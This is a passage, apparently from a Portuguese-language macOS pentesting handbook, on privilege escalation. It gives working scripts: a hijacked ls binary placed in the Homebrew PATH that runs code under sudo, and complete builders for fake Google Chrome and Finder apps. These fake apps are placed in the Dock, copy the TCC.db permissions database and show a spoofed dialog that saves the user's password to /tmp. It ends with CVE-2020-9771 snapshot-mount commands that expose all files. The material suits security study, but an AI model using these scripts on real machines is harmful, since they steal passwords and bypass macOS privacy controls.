No entanto, o macOS mantém o PATH do usuário quando ele executa sudo. O que significa que outra maneira de realizar este ataque seria sequestrar outros binários que a vítima ainda executará ao executar sudo:
# Let's hijack ls in /opt/homebrew/bin, as this is usually already in the users PATHcat>/opt/homebrew/bin/ls<<EOF#!/bin/bashif [ "\$(id -u)" -eq 0 ]; thenwhoami > /tmp/privescfi/bin/ls "\$@"EOFchmod+x/opt/homebrew/bin/ls# victimsudols
Note que um usuário que usa o terminal provavelmente terá Homebrew instalado. Portanto, é possível sequestrar binários em /opt/homebrew/bin.
Impersonação do Dock
Usando alguma engenharia social, você poderia impersonar, por exemplo, o Google Chrome dentro do dock e realmente executar seu próprio script:
Algumas sugestões:
Verifique no Dock se há um Chrome e, nesse caso, remova essa entrada e adicione a entrada falsado Chrome na mesma posição no array do Dock.
#!/bin/sh# THIS REQUIRES GOOGLE CHROME TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%Chrome%';rm-rf/tmp/Google\ Chrome.app/2>/dev/null# Create App structuremkdir-p/tmp/Google\ Chrome.app/Contents/MacOSmkdir-p/tmp/Google\ Chrome.app/Contents/Resources# Payload to executecat>/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /Applications/Google\\\\ Chrome.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Enter your password to update Google Chrome:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"Applications:Google Chrome.app:Contents:Resources:app.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.c-o/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chromerm-rf/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome.cchmod+x/tmp/Google\ Chrome.app/Contents/MacOS/Google\ Chrome# Info.plistcat<<EOF>/tmp/Google\ Chrome.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Google Chrome</string><key>CFBundleIdentifier</key><string>com.google.Chrome</string><key>CFBundleName</key><string>Google Chrome</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Google Chromecp/Applications/Google\ Chrome.app/Contents/Resources/app.icns/tmp/Google\ Chrome.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Google Chrome.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
Algumas sugestões:
Você não pode remover o Finder do Dock, então se você for adicioná-lo ao Dock, pode colocar o Finder falso logo ao lado do verdadeiro. Para isso, você precisa adicionar a entrada do Finder falso no início do array do Dock.
Outra opção é não colocá-lo no Dock e apenas abri-lo, "Finder pedindo para controlar o Finder" não é tão estranho.
Outra opção para escalar para root sem pedir a senha com uma caixa horrível, é fazer o Finder realmente pedir a senha para realizar uma ação privilegiada:
Pedir ao Finder para copiar para /etc/pam.d um novo arquivo sudo (O prompt pedindo a senha indicará que "Finder quer copiar sudo")
Pedir ao Finder para copiar um novo Plugin de Autorização (Você pode controlar o nome do arquivo para que o prompt pedindo a senha indique que "Finder quer copiar Finder.bundle")
#!/bin/sh# THIS REQUIRES Finder TO BE INSTALLED (TO COPY THE ICON)# If you want to removed granted TCC permissions: > delete from access where client LIKE '%finder%';rm-rf/tmp/Finder.app/2>/dev/null# Create App structuremkdir-p/tmp/Finder.app/Contents/MacOSmkdir-p/tmp/Finder.app/Contents/Resources# Payload to executecat>/tmp/Finder.app/Contents/MacOS/Finder.c<<EOF#include <stdio.h>#include <stdlib.h>#include <unistd.h>int main() {char *cmd = "open /System/Library/CoreServices/Finder.app & ""sleep 2; ""osascript -e 'tell application \"Finder\"' -e 'set homeFolder to path to home folder as string' -e 'set sourceFile to POSIX file \"/Library/Application Support/com.apple.TCC/TCC.db\" as alias' -e 'set targetFolder to POSIX file \"/tmp\" as alias' -e 'duplicate file sourceFile to targetFolder with replacing' -e 'end tell'; ""PASSWORD=\$(osascript -e 'Tell application \"Finder\"' -e 'Activate' -e 'set userPassword to text returned of (display dialog \"Finder needs to update some components. Enter your password:\" default answer \"\" with hidden answer buttons {\"OK\"} default button 1 with icon file \"System:Library:CoreServices:Finder.app:Contents:Resources:Finder.icns\")' -e 'end tell' -e 'return userPassword'); ""echo \$PASSWORD > /tmp/passwd.txt";system(cmd);return 0;}EOFgcc/tmp/Finder.app/Contents/MacOS/Finder.c-o/tmp/Finder.app/Contents/MacOS/Finderrm-rf/tmp/Finder.app/Contents/MacOS/Finder.cchmod+x/tmp/Finder.app/Contents/MacOS/Finder# Info.plistcat<<EOF>/tmp/Finder.app/Contents/Info.plist<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN""http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>CFBundleExecutable</key><string>Finder</string><key>CFBundleIdentifier</key><string>com.apple.finder</string><key>CFBundleName</key><string>Finder</string><key>CFBundleVersion</key><string>1.0</string><key>CFBundleShortVersionString</key><string>1.0</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleIconFile</key><string>app</string></dict></plist>EOF# Copy icon from Findercp/System/Library/CoreServices/Finder.app/Contents/Resources/Finder.icns/tmp/Finder.app/Contents/Resources/app.icns# Add to Dockdefaultswritecom.apple.dockpersistent-apps-array-add'<dict><key>tile-data</key><dict><key>file-data</key><dict><key>_CFURLString</key><string>/tmp/Finder.app</string><key>_CFURLStringType</key><integer>0</integer></dict></dict></dict>'sleep0.1killallDock
TCC - Escalação de Privilégios de Root
CVE-2020-9771 - bypass do TCC do mount_apfs e escalonamento de privilégios
Qualquer usuário (mesmo os sem privilégios) pode criar e montar um snapshot do Time Machine e acessar TODOS os arquivos desse snapshot.
O único privilégio necessário é que o aplicativo usado (como Terminal) tenha acesso Total ao Disco (FDA) (kTCCServiceSystemPolicyAllfiles), que precisa ser concedido por um administrador.
# Create snapshottmutillocalsnapshot# List snapshotstmutillistlocalsnapshots/Snapshotsfordisk/:com.apple.TimeMachine.2023-05-29-001751.local# Generate folder to mount itcd/tmp# I didn it from this foldermkdir/tmp/snap# Mount it, "noowners" will mount the folder so the current user can access everything/sbin/mount_apfs-onoowners-scom.apple.TimeMachine.2023-05-29-001751.local/System/Volumes/Data/tmp/snap# Access itls/tmp/snap/Users/admin_user# This will work